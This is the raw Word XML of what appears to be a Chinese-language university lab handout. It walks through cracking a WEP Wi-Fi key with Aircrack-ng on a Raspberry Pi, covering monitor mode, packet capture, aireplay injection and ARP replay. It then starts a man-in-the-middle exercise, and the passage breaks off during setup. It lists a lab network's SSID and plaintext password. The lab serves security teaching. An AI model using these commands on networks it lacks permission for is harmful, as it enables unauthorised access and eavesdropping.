      <w:pPr>
        <w:widowControl/>
        <w:tabs>
          <w:tab w:val="left" w:pos="480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lastRenderedPageBreak/>
        <w:t>目標</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/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一</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd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: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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Aircrack</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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-ng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破解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WEP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協定密碼</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F10376A" w14:textId="1CF36817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noProof/>
          <w:kern w:val="0"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4572BAAF" wp14:editId="1E2C1A23">
            <wp:extent cx="2174918" cy="17430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42" cy="17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6BF" w14:textId="400EF5FB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背景</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23BABD31" w14:textId="77777777" w:rsidR="006123A9" w:rsidRPr="007A4F58" w:rsidRDefault="006123A9" w:rsidP="0006478A">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr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Cs w:val="24"/>
        </w:rPr>
        <w:t>W</w:t>
      </w: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ireless </w:t>
      </w:r>
      <w:r w:rsidRPr="007A4F58">
        <w:rPr>
          <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體" w:cs="新細明體"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>E</w:t>
      </w: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ncryption </w:t>
      </w:r>
      <w:r w:rsidRPr="007A4F58">
        <w:rPr>
          <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體" w:cs="新細明體"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>P</w:t>
      </w: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rotocol (</w:t>
      </w:r>
      <w:r w:rsidRPr="007A4F58">
        <w:rPr>
          <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體" w:cs="新細明體"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>WEP)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DF8C06A" w14:textId="77777777" w:rsidR="006123A9" w:rsidRPr="007A4F58" w:rsidRDefault="006123A9" w:rsidP="0006478A">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="20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IEEE 802.11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標準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(1999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年通過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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AFA8483" w14:textId="77777777" w:rsidR="006123A9" w:rsidRPr="007A4F58" w:rsidRDefault="006123A9" w:rsidP="0006478A">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="20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RC4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57BA85E8" w14:textId="77777777" w:rsidR="006123A9" w:rsidRPr="007A4F58" w:rsidRDefault="006123A9" w:rsidP="0006478A">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="20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IEEE 802.11i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中被淘汰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(2004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年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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18FF818B" w14:textId="3890FFD6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Processing flow</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DB39135" w14:textId="12A7109C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drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="245E3376" wp14:editId="63536DC5">
            <wp:extent cx="3063303" cy="2665730"/>
            <wp:effectExtent l="0" t="0" r="3810" b="1270"/>
            <wp:docPr id="4" name="內容版面配置區 3">
              <a:extLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A856C4D7-9AC9-46D6-A69C-567524E134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>
                      <a:extLst>
                        <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                          <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A856C4D7-9AC9-46D6-A69C-567524E134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09" cy="26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4F5AF" w14:textId="01F4188B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工具說明</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="143D3CF4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ifconfig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：啟動及查看網卡狀態。 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C582BEB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iwconfig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：查看無線網卡的狀態及作用模式。 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D999098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airmon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：將無線網卡啟用在監聽模式。 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="774CCFDD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airodump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：擷取往來的封包。 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58CF3769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aireplay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：利用阻斷方式讓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Client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重新尋求連線。 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="208DA72A" w14:textId="77777777" w:rsidR="006123A9" w:rsidRPr="007A4F58" w:rsidRDefault="006123A9" w:rsidP="0006478A">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21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aircrack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：利用擷取</w:t>
      </w:r>
      <w:proofErr w:type="gramStart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的封檔進行</w:t>
      </w:r>
      <w:proofErr w:type="gram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破解。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C5E4FB6" w14:textId="58B21BAF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Headless installation (USB)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EB59201" w14:textId="77777777" w:rsidR="006123A9" w:rsidRPr="007A4F58" w:rsidRDefault="006123A9" w:rsidP="0006478A">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0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lastRenderedPageBreak/>
        <w:t>在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/boot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中</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46AF15AB" w14:textId="77777777" w:rsidR="006123A9" w:rsidRPr="007A4F58" w:rsidRDefault="006123A9" w:rsidP="0006478A">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="1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新增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ssh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空白</w:t>
      </w:r>
      <w:proofErr w:type="gramStart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檔</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="45DF0AC7" w14:textId="77777777" w:rsidR="006123A9" w:rsidRPr="007A4F58" w:rsidRDefault="006123A9" w:rsidP="0006478A">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="1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新增新的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wpa_supplicant.conf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，建議以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nodepad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++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編輯</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18AD3CFA" w14:textId="77777777" w:rsidR="006123A9" w:rsidRPr="007A4F58" w:rsidRDefault="006123A9" w:rsidP="0006478A">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="1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修改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cmdline.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4908FDA4" w14:textId="77777777" w:rsidR="006123A9" w:rsidRPr="007A4F58" w:rsidRDefault="006123A9" w:rsidP="0006478A">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="2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在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rootwait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後增加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modules-load=dwc2,g_ether</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78F7469B" w14:textId="77777777" w:rsidR="006123A9" w:rsidRPr="007A4F58" w:rsidRDefault="006123A9" w:rsidP="0006478A">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="1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修改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config.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="415C93D5" w14:textId="77777777" w:rsidR="006123A9" w:rsidRPr="007A4F58" w:rsidRDefault="006123A9" w:rsidP="0006478A">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="2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增加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dtoverlay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=dwc2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17A01F09" w14:textId="77777777" w:rsidR="006123A9" w:rsidRPr="007A4F58" w:rsidRDefault="006123A9" w:rsidP="0006478A">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="1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找到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raspberry pi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IP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，以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ssh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進入</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74D348C6" w14:textId="77777777" w:rsidR="006123A9" w:rsidRPr="007A4F58" w:rsidRDefault="006123A9" w:rsidP="0006478A">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="2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預設帳號：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pi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="689BD015" w14:textId="77777777" w:rsidR="006123A9" w:rsidRPr="007A4F58" w:rsidRDefault="006123A9" w:rsidP="0006478A">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="22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預設密碼：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raspberry</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43DCDE11" w14:textId="448F761C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Raspberry pi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初始設定</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11D33372" w14:textId="77777777" w:rsidR="006123A9" w:rsidRPr="007A4F58" w:rsidRDefault="006123A9" w:rsidP="0006478A">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23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s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apt-get update </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E694C84" w14:textId="77777777" w:rsidR="006123A9" w:rsidRPr="007A4F58" w:rsidRDefault="006123A9" w:rsidP="0006478A">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23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apt-get upgrade -y </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58A95552" w14:textId="77777777" w:rsidR="006123A9" w:rsidRPr="007A4F58" w:rsidRDefault="006123A9" w:rsidP="0006478A">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23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apt-get remove -y vim-common </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="733AFDE2" w14:textId="77777777" w:rsidR="006123A9" w:rsidRPr="007A4F58" w:rsidRDefault="006123A9" w:rsidP="0006478A">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23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apt-get install -y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aircrack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vim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tmux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4EB2DA0D" w14:textId="173BE47A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</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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usb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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 xml:space="preserve"> interface</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59128BBE" w14:textId="77777777" w:rsidR="006123A9" w:rsidRPr="007A4F58" w:rsidRDefault="006123A9" w:rsidP="0006478A">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24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s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vim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/network/interfaces</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3787DA2E" w14:textId="77777777" w:rsidR="006123A9" w:rsidRPr="007A4F58" w:rsidRDefault="006123A9" w:rsidP="0006478A">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24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新增</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71C9EE99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allow-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hotplug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usb0 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AD36641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iface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usb0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inet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static </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B06C36C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  <w:t xml:space="preserve">address 192.168.7.2 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D83F128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  <w:t xml:space="preserve">netmask 255.255.255.0 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29C76D17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  <w:t xml:space="preserve">network 192.168.7.0 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62B0D1DC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  <w:t xml:space="preserve">broadcast 192.168.7.255 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="346FE234" w14:textId="77777777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  <w:t xml:space="preserve">gateway 192.168.7.1 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FB8E23A" w14:textId="103074CE" w:rsidR="0006478A" w:rsidRPr="007A4F58" w:rsidRDefault="0006478A" w:rsidP="0006478A">
      <w:pPr>
        <w:widowControl/>
        <w:snapToGrid w:val="0"/>
        <w:spacing w:line="240" w:lineRule="atLeast"/>
        <w:ind w:leftChars="600" w:left="144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dns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-nameserver 8.8.8.8 8.8.4.4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DFDADD9" w14:textId="7F05D22A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WIN 10 RNDIS IP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AFD277D" w14:textId="77777777" w:rsidR="006123A9" w:rsidRPr="007A4F58" w:rsidRDefault="006123A9" w:rsidP="0006478A">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25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這邊要將電腦與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raspberry pi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設定在同一</w:t>
      </w:r>
      <w:proofErr w:type="gramStart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個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LAN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CE0C546" w14:textId="77777777" w:rsidR="006123A9" w:rsidRPr="007A4F58" w:rsidRDefault="006123A9" w:rsidP="0006478A">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25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開始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)→設定→網路及網際網路→變更介面卡選項→USB Ethernet/RNDIS Gadget Interface (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) → IPv4 →內容</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75FCC041" w14:textId="77777777" w:rsidR="006123A9" w:rsidRPr="007A4F58" w:rsidRDefault="006123A9" w:rsidP="0006478A">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25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設定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IP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C6875CB" w14:textId="77777777" w:rsidR="006123A9" w:rsidRPr="007A4F58" w:rsidRDefault="006123A9" w:rsidP="0006478A">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="25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IP: 192.168.7.10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E7BFA6F" w14:textId="77777777" w:rsidR="006123A9" w:rsidRPr="007A4F58" w:rsidRDefault="006123A9" w:rsidP="0006478A">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="25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lastRenderedPageBreak/>
        <w:t>Mask: 255.255.255.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D5C947D" w14:textId="2F2526C4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設定監聽模式</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32DD0B37" w14:textId="77777777" w:rsidR="006123A9" w:rsidRPr="007A4F58" w:rsidRDefault="006123A9" w:rsidP="0006478A">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0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將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raspberry pi(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TypeC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)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與電腦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TypeA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)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相連</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6503FB8B" w14:textId="77777777" w:rsidR="006123A9" w:rsidRPr="007A4F58" w:rsidRDefault="006123A9" w:rsidP="0006478A">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0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airmon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check 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kill</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="64D5F709" w14:textId="77777777" w:rsidR="006123A9" w:rsidRPr="007A4F58" w:rsidRDefault="006123A9" w:rsidP="0006478A">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0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airmon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start &lt;interface&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F72F18D" w14:textId="77777777" w:rsidR="006123A9" w:rsidRPr="007A4F58" w:rsidRDefault="006123A9" w:rsidP="0006478A">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="1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注意：這邊要用監聽的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interface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，此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interface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需支援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monitor mode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，可用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iw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list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指令查詢。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77A9B3E4" w14:textId="77777777" w:rsidR="006123A9" w:rsidRPr="007A4F58" w:rsidRDefault="006123A9" w:rsidP="0006478A">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="1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若出現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disable avahi-daemon</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="446733D4" w14:textId="77777777" w:rsidR="006123A9" w:rsidRPr="007A4F58" w:rsidRDefault="006123A9" w:rsidP="0006478A">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="2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用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service avahi-daemon stop 停用服務</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="463C2B8D" w14:textId="77777777" w:rsidR="006123A9" w:rsidRPr="007A4F58" w:rsidRDefault="006123A9" w:rsidP="0006478A">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="26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請記得更改後的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interface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名稱，例如：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wlan0mon</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F4D0791" w14:textId="53203B7F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破解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WEP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D389FF0" w14:textId="77777777" w:rsidR="006123A9" w:rsidRPr="007A4F58" w:rsidRDefault="006123A9" w:rsidP="0006478A">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0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探測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AP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並擷取封包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airodump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-ng)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，找到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bssid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address</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="405CA0D7" w14:textId="77777777" w:rsidR="006123A9" w:rsidRPr="007A4F58" w:rsidRDefault="006123A9" w:rsidP="0006478A">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="1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airodump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&lt;interface&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C932C1A" w14:textId="77777777" w:rsidR="006123A9" w:rsidRPr="007A4F58" w:rsidRDefault="006123A9" w:rsidP="0006478A">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0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取得指定頻道封包</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="750FACAC" w14:textId="77777777" w:rsidR="006123A9" w:rsidRPr="007A4F58" w:rsidRDefault="006123A9" w:rsidP="0006478A">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="1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a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irodump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-c &lt;channel&gt; -w &lt;file name&gt; –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bssid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XX:XX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:XX:XX:XX:XX &lt;interface&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75602A68" w14:textId="77777777" w:rsidR="006123A9" w:rsidRPr="007A4F58" w:rsidRDefault="006123A9" w:rsidP="0006478A">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="1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-c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擷取目標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AP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的工作頻道</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0547D597" w14:textId="77777777" w:rsidR="006123A9" w:rsidRPr="007A4F58" w:rsidRDefault="006123A9" w:rsidP="0006478A">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="27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-w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保存擷取封包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.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檔名設定為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&lt;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學號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&gt;,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但產生的文件是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&lt;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學號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&gt;-01.cap</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16975FE4" w14:textId="3C949BF9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noProof/>
          <w:kern w:val="0"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="46762B5E" wp14:editId="10832787">
            <wp:extent cx="5267325" cy="15716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7135" w14:textId="6546F111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破解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WEP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="463DE931" w14:textId="77777777" w:rsidR="006123A9" w:rsidRPr="007A4F58" w:rsidRDefault="006123A9" w:rsidP="0006478A">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0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使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用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aireplay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注入封包，建立定期重新連接延遲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.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以每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X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秒重新連接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AP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5027CD03" w14:textId="77777777" w:rsidR="006123A9" w:rsidRPr="007A4F58" w:rsidRDefault="006123A9" w:rsidP="0006478A">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="1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aireplay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-ng -1 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X  -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>e &lt;ESSID&gt; &lt;interface&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21F0C3E8" w14:textId="77777777" w:rsidR="006123A9" w:rsidRPr="007A4F58" w:rsidRDefault="006123A9" w:rsidP="0006478A">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0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抓取合法使用者的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ARP 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要求，並且仿造重送</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C9870A0" w14:textId="77777777" w:rsidR="006123A9" w:rsidRPr="007A4F58" w:rsidRDefault="006123A9" w:rsidP="0006478A">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="1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aireplay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-3 -e &lt; ESSID &gt; &lt;interface&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F257FB1" w14:textId="77777777" w:rsidR="006123A9" w:rsidRPr="007A4F58" w:rsidRDefault="006123A9" w:rsidP="0006478A">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0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約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30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分鐘後，可以嘗試破解密碼</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CA093C7" w14:textId="77777777" w:rsidR="006123A9" w:rsidRPr="007A4F58" w:rsidRDefault="006123A9" w:rsidP="0006478A">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0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lastRenderedPageBreak/>
        <w:t>破解密碼</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0751F11E" w14:textId="77777777" w:rsidR="006123A9" w:rsidRPr="007A4F58" w:rsidRDefault="006123A9" w:rsidP="0006478A">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="28"/>
        </w:numPr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aircrack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&lt;file name&gt;-01.cap</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45A22D06" w14:textId="0EE56FF0" w:rsidR="0006478A" w:rsidRPr="007A4F58" w:rsidRDefault="0006478A" w:rsidP="0006478A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drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="701E0E3D" wp14:editId="69FC67D7">
            <wp:extent cx="5274310" cy="1150620"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"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DDD3ABBD-310D-44C9-B250-B332877D2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DDD3ABBD-310D-44C9-B250-B332877D2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5395" w14:textId="77777777" w:rsidR="006123A9" w:rsidRPr="007A4F58" w:rsidRDefault="006123A9" w:rsidP="006123A9">
      <w:pPr>
        <w:widowControl/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檢核點：需將破解密碼畫面截圖</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D9B16FA" w14:textId="5CC9A43A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 w:val="32"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="27E06800" wp14:editId="52BDF76B">
            <wp:extent cx="3458022" cy="1800225"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
            <wp:docPr id="8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1E414CFC-59F2-4E09-B5D3-47552F26FC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1E414CFC-59F2-4E09-B5D3-47552F26FC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44562" r="40760" b="16988"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3463801" cy="180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358A" w14:textId="7A173D01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復原</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40DE04C8" w14:textId="77777777" w:rsidR="006123A9" w:rsidRPr="007A4F58" w:rsidRDefault="006123A9" w:rsidP="0006478A">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0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關閉監聽</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="206A3B09" w14:textId="77777777" w:rsidR="006123A9" w:rsidRPr="007A4F58" w:rsidRDefault="006123A9" w:rsidP="0006478A">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="1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airmon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-ng stop &lt;interface&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26677B99" w14:textId="77777777" w:rsidR="006123A9" w:rsidRPr="007A4F58" w:rsidRDefault="006123A9" w:rsidP="0006478A">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0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復原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Network Manager</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AFD6051" w14:textId="77777777" w:rsidR="006123A9" w:rsidRPr="007A4F58" w:rsidRDefault="006123A9" w:rsidP="0006478A">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="1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service networking restart</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1564E50F" w14:textId="77777777" w:rsidR="006123A9" w:rsidRPr="007A4F58" w:rsidRDefault="006123A9" w:rsidP="0006478A">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0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刪除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/network/interface</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79DE4295" w14:textId="77777777" w:rsidR="0006478A" w:rsidRPr="007A4F58" w:rsidRDefault="006123A9" w:rsidP="0006478A">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0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重新開機</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="688C4500" w14:textId="5EAD5586" w:rsidR="0006478A" w:rsidRPr="007A4F58" w:rsidRDefault="0006478A" w:rsidP="0006478A">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="29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reboot</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AB6D836" w14:textId="139163FD" w:rsidR="0006478A" w:rsidRPr="007A4F58" w:rsidRDefault="0006478A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br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BB5A89E" w14:textId="3BA635D0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lastRenderedPageBreak/>
        <w:t>目標二：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Man-in-the-middle attack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="726B2E59" w14:textId="45DE8946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noProof/>
          <w:kern w:val="0"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5230851F" wp14:editId="0A7AE054">
            <wp:extent cx="5267325" cy="2590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1947" w14:textId="2BDB72C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初始設定</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A768E48" w14:textId="77777777" w:rsidR="006123A9" w:rsidRPr="007A4F58" w:rsidRDefault="006123A9" w:rsidP="0006478A">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30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新增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ssh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空白</w:t>
      </w:r>
      <w:proofErr w:type="gramStart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檔</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="413D3D5F" w14:textId="77777777" w:rsidR="006123A9" w:rsidRPr="007A4F58" w:rsidRDefault="006123A9" w:rsidP="0006478A">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30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新增新的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wpa_supplicant.conf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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，建議以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nodepad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++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編輯</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65682E7D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ctrl_interface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=DIR=/var/run/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wpa_supplicant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GROUP=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netdev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68CC6E77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update_config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=1 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05B6AB24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country=TW </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BD04ABC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network</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007A4F58">
        <w:rPr>
          <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體" w:cs="新細明體"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>={</w:t>
      </w:r>
      <w:proofErr w:type="gram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10CFF327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ssid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="HSNG-A2.4" </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14AFE561" w14:textId="77777777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psk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="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hsng@root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" </w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w14:paraId="0C10F472" w14:textId="694B3243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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04D42526" w14:textId="1DA7F110" w:rsidR="0006478A" w:rsidRPr="007A4F58" w:rsidRDefault="0006478A" w:rsidP="0006478A">
      <w:pPr>
        <w:widowControl/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Raspberry pi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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A833592" w14:textId="77777777" w:rsidR="006123A9" w:rsidRPr="007A4F58" w:rsidRDefault="006123A9" w:rsidP="0006478A">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
